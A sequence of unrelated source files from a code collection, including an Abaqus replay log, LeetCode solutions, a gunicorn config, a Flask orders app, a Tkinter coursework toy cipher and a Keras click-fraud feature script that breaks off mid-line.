...\nfrom abaqus import 
*\nfrom abaqusConstants import *\nsession.Viewport(name='Viewport: 1', origin=(0.0, 0.0), width=189.999997615814, \n height=126.824998408556)\nsession.viewports['Viewport: 1'].makeCurrent()\nsession.viewports['Viewport: 1'].maximize()\nfrom caeModules import *\nfrom driverUtils import executeOnCaeStartup\nexecuteOnCaeStartup()\nopenMdb('test.cae')\n#: The model database \"C:\\Users\\Anzong\\Desktop\\test.cae\" has been opened.\nsession.viewports['Viewport: 1'].setValues(displayedObject=None)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=ON)\np = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=ON, \n engineeringFeatures=ON)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=OFF)\nmdb.models['Model-1'].Material(name='Steel')\nmdb.models['Model-1'].materials['Steel'].Elastic(table=((200000000000.0, 0.3), \n ))\nmdb.models['Model-1'].TrussSection(name='FrameSection', material='Steel', \n area=1.96349540849362e-05)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\np = mdb.models['Model-1'].parts['Frame']\ne = p.edges\nedges = e.getSequenceFromMask(mask=('[#7f ]', ), )\nregion = p.Set(edges=edges, name='Set-1')\np = mdb.models['Model-1'].parts['Frame']\np.SectionAssignment(region=region, sectionName='FrameSection', offset=0.0, \n offsetType=MIDDLE_SURFACE, offsetField='', \n thicknessAssignment=FROM_SECTION)\na = mdb.models['Model-1'].rootAssembly\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(\n 
adaptiveMeshConstraints=ON, optimizationTasks=OFF, \n geometricRestrictions=OFF, stopConditions=OFF)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nmdb.models['Model-1'].StaticLinearPerturbationStep(name='Apply load', \n previous='Initial', description='10 kN central load')\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(step='Apply load')\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=ON, bcs=ON, \n predefinedFields=ON, connectors=ON, adaptiveMeshConstraints=OFF)\nsession.viewports['Viewport: 1'].view.setValues(nearPlane=3.50669, \n farPlane=5.49331, width=2.90668, height=1.43737, viewOffsetX=-0.0428107, \n viewOffsetY=0.00856215)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF, \n engineeringFeatures=OFF)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=ON)\np1 = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p1)\na = mdb.models['Model-1'].rootAssembly\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=ON, \n engineeringFeatures=ON)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=OFF)\np1 = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p1)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\na = mdb.models['Model-1'].rootAssembly\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=OFF, bcs=OFF, \n predefinedFields=OFF, connectors=OFF)\na = 
mdb.models['Model-1'].rootAssembly\na.DatumCsysByDefault(CARTESIAN)\np = mdb.models['Model-1'].parts['Frame']\na.Instance(name='Frame-1', part=p, dependent=ON)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=ON, bcs=ON, \n predefinedFields=ON, connectors=ON)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(step='Initial')\na = mdb.models['Model-1'].rootAssembly\nv1 = a.instances['Frame-1'].vertices\nverts1 = v1.getSequenceFromMask(mask=('[#4 ]', ), )\nregion = a.Set(vertices=verts1, name='Set-1')\nmdb.models['Model-1'].DisplacementBC(name='Fixed', createStepName='Initial', \n region=region, u1=SET, u2=SET, ur3=UNSET, amplitude=UNSET, \n distributionType=UNIFORM, fieldName='', localCsys=None)\na = mdb.models['Model-1'].rootAssembly\nv1 = a.instances['Frame-1'].vertices\nverts1 = v1.getSequenceFromMask(mask=('[#10 ]', ), )\nregion = a.Set(vertices=verts1, name='Set-2')\nmdb.models['Model-1'].DisplacementBC(name='BC-2', createStepName='Initial', \n region=region, u1=UNSET, u2=SET, ur3=UNSET, amplitude=UNSET, \n distributionType=UNIFORM, fieldName='', localCsys=None)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(step='Apply load')\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\na = mdb.models['Model-1'].rootAssembly\nv1 = a.instances['Frame-1'].vertices\nverts1 = v1.getSequenceFromMask(mask=('[#8 ]', ), )\nregion = a.Set(vertices=verts1, name='Set-3')\nmdb.models['Model-1'].ConcentratedForce(name='Force', \n createStepName='Apply load', region=region, cf2=-10000.0, \n distributionType=UNIFORM, field='', localCsys=None)\np1 = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p1)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF, \n engineeringFeatures=OFF, mesh=ON)\nsession.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(\n meshTechnique=ON)\nmdb.meshEditOptions.setValues(enableUndo=True, 
maxUndoCacheElements=0.5)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=ON, \n engineeringFeatures=ON, mesh=OFF)\nsession.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(\n meshTechnique=OFF)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF, \n engineeringFeatures=OFF, mesh=ON)\nsession.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(\n meshTechnique=ON)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nelemType1 = mesh.ElemType(elemCode=T2D2, elemLibrary=STANDARD)\np = mdb.models['Model-1'].parts['Frame']\ne = p.edges\nedges = e.getSequenceFromMask(mask=('[#7f ]', ), )\npickedRegions =(edges, )\np.setElementType(regions=pickedRegions, elemTypes=(elemType1, ))\nsession.viewports['Viewport: 1'].view.setValues(nearPlane=4.06172, \n farPlane=4.65608, width=1.95683, height=0.971544, viewOffsetX=-0.00133005, \n viewOffsetY=-0.00199512)\np = mdb.models['Model-1'].parts['Frame']\np.seedPart(size=1.0, deviationFactor=0.1, minSizeFactor=0.1)\np = mdb.models['Model-1'].parts['Frame']\np.generateMesh()\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\na = mdb.models['Model-1'].rootAssembly\na.regenerate()\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=OFF, bcs=OFF, \n predefinedFields=OFF, connectors=OFF)\nmdb.Job(name='Frame', model='Model-1', \n description='Two-dimensional overhead hoist frame', type=ANALYSIS, \n atTime=None, waitMinutes=0, waitHours=0, queue=None, memory=50, \n memoryUnits=PERCENTAGE, getMemoryFromAnalysis=True, \n explicitPrecision=SINGLE, nodalOutputPrecision=SINGLE, echoPrint=OFF, \n modelPrint=OFF, contactPrint=OFF, historyPrint=OFF, userSubroutine='', \n scratch='', 
multiprocessingMode=DEFAULT, numCpus=1, numGPUs=0)\nmdb.jobs['Frame'].submit(consistencyChecking=OFF, datacheckJob=True)\n#: The job input file \"Frame.inp\" has been submitted for analysis.\n#: Error in job Frame: Unable to change the current working directory to C:\\Users\\Anzong\\AppData\\Local\\Temp\\Anzong_Frame_6708. \n#: Job Frame aborted due to errors.\nmdb.save()\n#: The model database has been saved to \"C:\\Users\\Anzong\\Desktop\\test.cae\".\n","sub_path":"Abaqus/2015-1-20-Abaqus CAE - Example/2015-1-18-A overhead hoist example/abaqus.rpy","file_name":"abaqus.rpy","file_ext":"rpy","file_size_in_byte":8661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"187224300","text":"class Solution(object):\n def letterCasePermutation(self, S):\n \"\"\"\n :type S: str\n :rtype: List[str]\n \"\"\"\n res = []\n def dfs(i, S, temp):\n if i==len(S):\n res.append(\"\".join(temp))\n return\n if S[i].isalpha():\n temp.append(S[i].lower())\n dfs(i+1, S, temp)\n temp.pop()\n temp.append(S[i].upper())\n dfs(i+1, S, temp)\n temp.pop()\n else:\n temp.append(S[i])\n dfs(i+1, S, temp)\n temp.pop()\n dfs(0, S, [])\n return res\n","sub_path":"Leetcode/dfs_recursion_backtracking/784_LetterCasePermutation/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"421389487","text":"import pandas as pd\n\nuser_history_dict = dict()\ntrain_data = []\nitem_corpus = []\ncorpus_index = dict()\nwith open(\"train.txt\", \"r\") as fid:\n for line in fid:\n splits = line.strip().split()\n user_id = splits[0]\n items = splits[1:]\n user_history_dict[user_id] = items\n for item in items:\n if item not in corpus_index:\n corpus_index[item] = len(corpus_index)\n item_corpus.append([corpus_index[item], item])\n history = user_history_dict[user_id].copy()\n history.remove(item)\n train_data.append([user_id, 
corpus_index[item], 1, user_id, \"^\".join(history)])\ntrain = pd.DataFrame(train_data, columns=[\"query_index\", \"corpus_index\", \"label\", \"user_id\", \"user_history\"])\nprint(\"train samples:\", len(train))\ntrain.to_csv(\"train.csv\", index=False)\n\ntest_data = []\nwith open(\"test.txt\", \"r\") as fid:\n for line in fid:\n splits = line.strip().split()\n user_id = splits[0]\n items = splits[1:]\n for item in items:\n if item not in corpus_index:\n corpus_index[item] = len(corpus_index)\n item_corpus.append([corpus_index[item], item])\n history = user_history_dict[user_id].copy()\n test_data.append([user_id, corpus_index[item], 1, user_id, \"^\".join(history)])\ntest = pd.DataFrame(test_data, columns=[\"query_index\", \"corpus_index\", \"label\", \"user_id\", \"user_history\"])\nprint(\"test samples:\", len(test))\ntest.to_csv(\"test.csv\", index=False)\n\ncorpus = pd.DataFrame(item_corpus, columns=[\"corpus_index\", \"item_id\"])\nprint(\"number of items:\", len(item_corpus))\ncorpus = corpus.set_index(\"corpus_index\")\ncorpus.to_csv(\"item_corpus.csv\", index=False)","sub_path":"datasets/Gowalla/Gowalla_m1/MatchBox_data_converter.py","file_name":"MatchBox_data_converter.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286187585","text":"import os\nimport gevent.monkey\ngevent.monkey.patch_all()\n\nimport multiprocessing\n\ndebug = True\nloglevel = 'debug'\nbind = '0.0.0.0:9000'\npidfile='/var/log/gunicorn/scrumpid.log'\nerrorlog='/var/log/gunicorn/error.log'\naccesslog='/var/log/gunicorn/access.log'\n\n# processing num\nworkers = 2\nworker_class = 'gunicorn.workers.ggevent.GeventWorker'\n\nx_forwarded_for_header = 'X-FORWARDED-FOR'\n\n","sub_path":"websocketapi/gun.py","file_name":"gun.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"466105629","text":"# 
@Time : 2019/6/10 13:26\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, val, left, right, next):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\n\nclass Solution:\n def connect(self, root: 'Node') -> 'Node':\n first = root\n\n def helper(node: Node) -> None:\n if len(stack) == 0:\n stack.append(node)\n else:\n cur = stack.pop()\n cur.next = node\n stack.append(node)\n\n while first:\n next_ = first\n stack = []\n while next_:\n if next_.left:\n helper(next_.left)\n if next_.right:\n helper(next_.right)\n next_ = next_.next\n while first and not first.left and not first.right:\n first = first.next\n if first and first.left:\n first = first.left\n elif first and first.right:\n first = first.right\n return root\n\n def connect1(self, root: 'Node') -> 'Node':\n first = root\n while first:\n while first and not first.left and not first.right:\n first = first.next\n if not first: break\n next_, cur = first, None\n while next_:\n if next_.left:\n if cur:\n cur.next = next_.left\n cur = next_.left\n if next_.right:\n if cur:\n cur.next = next_.right\n cur = next_.right\n next_ = next_.next\n first = first.left if first.left else first.right\n return root\n","sub_path":"connectTwo.py","file_name":"connectTwo.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519043593","text":"from flask import Flask, render_template, request\nfrom sqlalchemy import create_engine, MetaData, Table, Column, Integer, String\nengine = create_engine('sqlite:///orders.db', echo = True)\nmeta = MetaData()\n\n\norders = Table('orders', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String),\n Column('company', String),\n Column('cost', Integer)\n )\n\nmeta.create_all(engine)\n\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n 
conn=engine.connect()\n db_urls = conn.execute('SELECT * FROM orders').fetchall()\n if request.method == 'POST':\n name = request.form['name']\n company = request.form['company']\n cost = request.form['cost']\n ins = orders.insert()\n ins = orders.insert().values(name=name, company=company, cost=cost)\n result = conn.execute(ins)\n return render_template('index.html', name=name, data=db_urls)\n\n return render_template('index.html', data=db_urls)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"432302587","text":"#\n# File Header\n#\n# Add your name to this\n\n# Define a function called piggy(string) that returns a string\npiggy = \"string\"\n\ndef piggy(word):\n\t\n\t# Magic Happens Here\n\tpig = word\n\t# Ignore previous line\n\t\n\treturn pig\n\n# Open the file *getty.txt* for reading. \nget = open(\"getty.txt\",\"r\")\n\n# Open a new file *piggy.txt* for writing. \npiggyfile = open(\"piggy.txt\",\"w\")\n\n# Read the getty.txt file into a string. \ngetstr = get.read()\n\n# Strip out bad characters (, - .). \ngetstr = getstr.replace (',','')\ngetstr = getstr.replace ('-','')\ngetstr = getstr.replace ('.','')\n\n# Split the string into a list of words. \ngetlist = getstr.split()\n\n# Create a new empty string. \nnewstr = \"\"\n\n# Loop through the list of words, pigifying each one. \nfor word in getlist:\n\tnewword = word [::-1]\n\tnewstr = newstr + newword + \" \"\n\t\n\n# Add the pigified word (and a space) to the new string. \noutfile = open(\"piggy.txt\",\"w\")\n\n# Write the new string to piggy.txt. 
\nprint (newstr, getlist, outfile)\n\n# close the files.\noutfile.close()\nget.close()","sub_path":"piggetty.py","file_name":"piggetty.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518867155","text":"from Tkinter import *\nfrom ScrolledText import ScrolledText\nimport random\nimport os\nheading = ('Courier', 15)\nnormal = ('Courier', 13)\n\nroot = Tk()\n\n\ndef shift(current, new, *args):\n current.grid_remove()\n new.grid()\n if args:\n for i in args:\n try:\n i.delete(0, END)\n except TclError:\n i.delete('0.0', END)\n args[0].focus()\n\n\ndef gen_key():\n key = ''\n for i in range(8):\n char = random.randrange(33, 127)\n char = chr(char)\n key += char\n return key\n\n\ndef offset(key):\n factor = sum(ord(i) for i in key)\n factor /= 8\n return factor - 32\n\n\ndef encryption(key, number):\n text = to_e.get()\n save = e_save.get()\n if os.path.exists(text):\n if os.path.getsize(text) <= 45 * 1024:\n try:\n newtext = open(save, 'w')\n factor = offset(key)\n changed = (option1(text, factor), option2(text, factor))[number]\n newtext.write(changed)\n newtext.close()\n return\n except:\n e_save.delete(0, END)\n e_save.insert(END, 'Invalid file address')\n else:\n to_e.delete(0, END)\n to_e.insert(END, 'File over 45Kb')\n else:\n to_e.delete(0, END)\n to_e.insert(END, 'Invalid filename')\n\n\ndef option1(text, factor):\n plain = open(text, 'r')\n cipher = ''\n for char in plain.read():\n if char not in (' ', '\\n'):\n char = ord(char) + factor\n if char > 126:\n char -= 94\n char = chr(char)\n cipher += char\n plain.close()\n return cipher\n\n\ndef option2(text, factor):\n plain = open(text, 'r')\n cipher = ''\n for char in plain.read().replace(' ', ''):\n if char != '\\n':\n if (len(cipher.replace('\\n', '')) - 5) % 6 == 0:\n cipher += ' '\n char = ord(char) + factor\n if char > 126:\n char -= 94\n char = chr(char)\n cipher += char\n plain.close()\n return 
cipher\n\n\ndef decryption():\n text = to_d.get()\n key = getkey.get()\n if os.path.exists(text):\n if len(key) == 8:\n cipher = open(text, 'r')\n factor = offset(key)\n plain = ''\n for char in cipher.read():\n if char not in (' ', '\\n'):\n char = ord(char) - factor\n if char < 33:\n char += 94\n char = chr(char)\n plain += char\n cipher.close()\n plaintext.delete('0.0', END)\n plaintext.insert(END, plain)\n return\n getkey.delete(0, END)\n getkey.insert(END, 'Invalid key')\n else:\n to_d.delete(0, END)\n to_d.insert(END, 'Invalid file address')\n\n\ndef en_screen(number=0):\n Label(e_frame, text='Encryption %d' % (number + 1), font=heading).grid(row=0, column=0, columnspan=2, padx=100, pady=10)\n key = Label(e_frame, text=gen_key(), bg='deepskyblue', font=normal)\n key.grid(row=2, column=1, padx=5, pady=5, sticky=W)\n Button(e_frame, text='Encrypt', font=normal, width=12, command=lambda: encryption(key.cget('text'), number)).grid(row=4, column=0, padx=5, pady=5)\n e_frame.grid()\n shift(start, e_frame, to_e, e_save)\n\n\ne_frame = Frame(root)\nLabel(e_frame, text='Text file to encrypt:', font=normal).grid(row=1, column=0, padx=5, pady=5, sticky=W)\nto_e = Entry(e_frame, width=25, bg='pale goldenrod', font=normal)\nto_e.grid(row=1, column=1, padx=5, pady=5, sticky=W)\nLabel(e_frame, text='Key:', font=normal).grid(row=2, column=0, padx=5, pady=5, sticky=W)\nLabel(e_frame, text='Save ciphertext to:', font=normal).grid(row=3, column=0, padx=5, pady=5, sticky=W)\ne_save = Entry(e_frame, width=25, bg='pale goldenrod', font=normal)\ne_save.grid(row=3, column=1, padx=5, pady=5, sticky=W)\nButton(e_frame, text='Back to menu', font=normal, width=12, command=lambda: shift(e_frame, start)).grid(row=4, column=1, padx=5, pady=5)\n\nd_frame = Frame(root)\nLabel(d_frame, text='Decryption', font=heading).grid(row=0, column=0, columnspan=2, padx=100, pady=10)\nLabel(d_frame, text='Text file to decrypt:', font=normal).grid(row=1, column=0, padx=5, pady=5, sticky=W)\nto_d = 
Entry(d_frame, width=25, bg='pale goldenrod', font=normal)\nto_d.grid(row=1, column=1, padx=5, pady=5, sticky=W)\nLabel(d_frame, text='Key:', font=normal).grid(row=2, column=0, padx=5, pady=5, sticky=W)\ngetkey = Entry(d_frame, width=25, bg='pale goldenrod', font=normal)\ngetkey.grid(row=2, column=1, padx=5, pady=5, sticky=W)\nLabel(d_frame, text='Plaintext:', font=normal).grid(row=3, column=0, padx=5, pady=5, sticky=N+W)\nplaintext = ScrolledText(d_frame, height=5, width=29, bg='deepskyblue', wrap=WORD)\nplaintext.grid(row=3, column=1, padx=5, pady=5, sticky=W)\nButton(d_frame, text='Decrypt', font=normal, width=12, command=decryption).grid(row=4, column=0, pady=10)\nButton(d_frame, text='Back to menu', font=normal, width=12, command=lambda: shift(d_frame, start)).grid(row=4, column=1, pady=10)\n\ninstruct = Frame(root)\nLabel(instruct, text=\"How to use the program\", font=heading).grid(row=0, column=0, padx=100, pady=10)\ndescriptions = Text(instruct, font=normal, width=50, height=15, wrap=WORD)\ndescriptions.insert(END, \"The encrypt options encrypt the text file given by a random 8 character long key. \")\ndescriptions.insert(END, \"The result is then saved to the file address given by the user. \")\ndescriptions.insert(END, \"Remember to include the ending!\")\ndescriptions.insert(END, \"\\n- 'Encryption 1' does this without changing the length of the words.\")\ndescriptions.insert(END, \"\\n- 'Encryption 2' groups blocks of 5 characters together and separates them with spaces.\")\ndescriptions.insert(END, \"\\n\\n'Decryption' decrypts the text file name given by the key inputted by the user. 
\")\ndescriptions.insert(END, \"Like in the encrypt options, the result is saved to the file address given by the user.\")\ndescriptions.insert(END, \"\\n\\nAnd the 'How to use' option is how you got here!\")\ndescriptions.grid(row=1, column=0, columnspan=2, padx=5, pady=5, sticky=W)\nButton(instruct, text='Back to menu', font=normal, width=12, command=lambda: shift(instruct, start)).grid(row=2, column=0, pady=5)\n\nstart = Frame(root)\nstart.grid()\nLabel(start, text='Options', font=heading).grid(row=0, column=0, columnspan=2, padx=50, pady=10)\nButton(start, text='Encryption 1', font=normal, width=12, command=en_screen).grid(row=1, column=0, padx=5, pady=5)\nButton(start, text='Encryption 2', font=normal, width=12, command=lambda: en_screen(1)).grid(row=1, column=1, padx=5, pady=5)\nButton(start, text='Decryption', font=normal, width=12, command=lambda: shift(start, d_frame, to_d, getkey, plaintext)).grid(row=2, column=0, padx=5, pady=5)\nButton(start, text='How to use', font=normal, width=12, command=lambda: shift(start, instruct)).grid(row=2, column=1, padx=5, pady=5)\n\nroot.mainloop()","sub_path":"GCSE Coursework/Traditional.py","file_name":"Traditional.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173925507","text":"from celery import task\r\nfrom django.core.mail import send_mail\r\nfrom .models import Order\r\n\r\n\r\n@task\r\ndef OrderCreated(order_id):\r\n\torder = Order.objects.get(id=order_id)\r\n\tsubject = f'Заказ с номером {order.id}'\r\n\tmessage = f'{order.first_name}, вы успешно сделали заказ.\\n \\\r\n\t\t\t\t\tНомер вашего заказа {order.id}'\r\n\tmail_send = send_mail(subject, message, 'admin@myshop.ru', [order.email])\r\n\treturn mail_send\r\n","sub_path":"my_shop/orders/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"54623103","text":"import pandas as pd\nimport numpy as np\nimport os\nos.environ['OMP_NUM_THREADS'] = '4'\nimport gc\n\nimport keras\nimport tensorflow as tf\n\n# set gpu usage\nconfig = tf.ConfigProto(gpu_options=tf.GPUOptions(visible_device_list=\"0\",\n allow_growth=True))\nsession = tf.Session(config=config)\nkeras.backend.tensorflow_backend.set_session(session)\n\ndtypes = {\n 'ip' : 'uint32',\n 'app' : 'uint16',\n 'device' : 'uint16',\n 'os' : 'uint16',\n 'channel' : 'uint16',\n 'is_attributed' : 'uint8',\n 'click_id' : 'uint32'\n }\nprint('load train....')\ntrain_df = pd.read_pickle(\"./data/training.pkl.gz\")\nval_df = pd.read_pickle(\"./data/validation.pkl.gz\")\n\nprint('load test....')\ntest_cols = ['ip', 'app', 'device', 'os', 'click_time', 'channel', 'click_id']\ntest_df = pd.read_csv(\"./data/test.csv\", dtype=dtypes, usecols=test_cols)\n\n\nlen_train = len(train_df)\nlen_test = len(test_df)\ntrain_df = train_df.append(val_df)\ntrain_df=train_df.append(test_df)\ndel test_df\ndel val_df\ngc.collect()\n\ntrain_df['click_time']= pd.to_datetime(train_df['click_time'])\n\nprint('click time....')\ntrain_df['click_time'] = (train_df['click_time'].astype(np.int64) // 10 ** 9).astype(np.int32)\ntrain_df['next_click'] = (train_df.groupby(['ip', 'app', 'device', 'os']).click_time.shift(-1) - train_df.click_time).astype(np.float32)\ntrain_df['next_click'].fillna((train_df['next_click'].mean()), inplace=True)\n\nprint('hour, day, wday....')\ntrain_df['hour'] = pd.to_datetime(train_df.click_time).dt.hour.astype('uint8')\ntrain_df['day'] = pd.to_datetime(train_df.click_time).dt.day.astype('uint8')\ntrain_df['wday'] = pd.to_datetime(train_df.click_time).dt.dayofweek.astype('uint8')\n\nprint('grouping by ip-day-hour combination....')\nfname = 'qty'\ngp = train_df[['ip','day','hour','channel']].groupby(by=['ip','day','hour'])[['channel']].count().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, 
on=['ip','day','hour'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by ip-app combination....')\nfname = 'ip_app_count'\ngp = train_df[['ip','app', 'channel']].groupby(by=['ip', 'app'])[['channel']].count().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip','app'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by ip-app-os combination....')\nfname = 'ip_app_os_count'\ngp = train_df[['ip','app', 'os', 'channel']].groupby(by=['ip', 'app', 'os'])[['channel']].count().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip','app', 'os'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by : ip_day_test_hh')\nfname = \"nip_day_test_hh\"\nmost_freq_hours_in_test_data = [4, 5, 9, 10, 13, 14]\nleast_freq_hours_in_test_data = [6, 11, 15]\ntrain_df['in_test_hh'] = ( 3 \n - 2*train_df['hour'].isin( most_freq_hours_in_test_data ) \n - 1*train_df['hour'].isin( least_freq_hours_in_test_data ) ).astype('uint8')\ngp = train_df[['ip', 'day', 'in_test_hh', 'channel']].groupby(by=['ip', 'day',\n 'in_test_hh'])[['channel']].count().reset_index().rename(index=str, \n columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip','day','in_test_hh'], how='left')\ndel gp\ntrain_df.drop(['in_test_hh'], axis=1, inplace=True)\ntrain_df[fname] = train_df[fname].astype('uint32')\ntrain_df[fname] = train_df[fname].values / 
np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ngc.collect()\n\nprint('group by ip-app-os combination....')\nfname = 'ip_ch_ncount'\ngp = train_df[['ip', 'channel']].groupby(by=['ip'])[['channel']].nunique().reset_index().rename(index=str, columns={'channel': fname})\ntrain_df = train_df.merge(gp, on=['ip'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint('group by ip-app-os combination....')\nfname = 'ip_day_hour_ncount'\ngp = train_df[['ip', 'day', 'hour']].groupby(by=['ip', 'day'])[['hour']].nunique().reset_index().rename(index=str, columns={'hour': fname})\ntrain_df = train_df.merge(gp, on=['ip', 'day'], how='left')\ntrain_df[fname] = train_df[fname].astype('uint16')\ntrain_df[fname] = train_df[fname].values / np.max(train_df[fname].values)\ntrain_df[fname] = train_df[fname].astype('float32')\ndel gp; gc.collect()\n\nprint(\"label encoding....\")\nfrom sklearn.preprocessing import LabelEncoder\ntrain_df[['app','device','os', 'channel', 'hour', 'day', 'wday']].apply(LabelEncoder().fit_transform)\n\nprint ('final part of preparation....')\ntest_df = train_df.iloc[-len_test:]\nval_df = train_df.iloc[len_train:-len_test]\ntrain_df = train_df.iloc[:len_train]\ny_train = train_df['is_attributed'].values\ny_val = val_df['is_attributed'].values\ntrain_df.drop(['click_id', 'click_time','ip','is_attributed'],1,inplace=True)\nval_df.drop(['click_id', 'click_time','ip','is_attributed'],1,inplace=True)\ngc.collect()\n\n\nprint ('neural network....')\nfrom keras.layers import Input, Embedding, Dense, Flatten, Dropout, concatenate\nfrom keras.layers import BatchNormalization, SpatialDropout1D, Conv1D\nfrom keras.callbacks import Callback\nfrom keras.models import Model\nfrom keras.optimizers import Adam\n\nmax_app = np.max([train_df['app'].max(), 
test_df['app'].max()])+1\nmax_ch = np.max([train_df['channel'].max(), test_df['channel'].max()])+1\nmax_dev = np.max([train_df['device'].max(), test_df['device'].max()])+1\nmax_os = np.max([train_df['os'].max(), test_df['os'].max()])+1\nmax_h = np.max([train_df['hour'].max(), test_df['hour'].max()])+1\nmax_d = np.max([train_df['day'].max(), test_df['day'].max()])+1\nmax_wd = np.max([train_df['wday'].max(), test_df['wday'].max()])+1\ndef get_keras_data(dataset):\n X = {\n 'app': np.array(dataset.app),\n 'ch': np.array(dataset.channel),\n 'dev': np.array(dataset.device),\n 'os': np.array(dataset.os),\n 'h': np.array(dataset.hour),\n 'd': np.array(dataset.day),\n 'wd': np.array(dataset.wday),\n 'qty': np.array(dataset.qty),\n 'c1': np.array(dataset.ip_app_count),\n 'c2': np.array(dataset.ip_app_os_count), \n \"c3\": np.array(dataset.nip_day_test_hh), \n \"c4\": np.array(dataset.ip_ch_ncount), \n \"c5\": np.array(dataset.ip_day_hour_ncount), \n 'nc': np.array(dataset.next_click)\n }\n return X\ntrain_df = get_keras_data(train_df)\nval_df = get_keras_data(val_df)\n\nemb_n = 50\ndense_n = 1000\nin_app = Input(shape=[1], name = 'app')\nemb_app = Embedding(max_app, emb_n)(in_app)\nin_ch = Input(shape=[1], name = 'ch')\nemb_ch = Embedding(max_ch, emb_n)(in_ch)\nin_dev = Input(shape=[1], name = 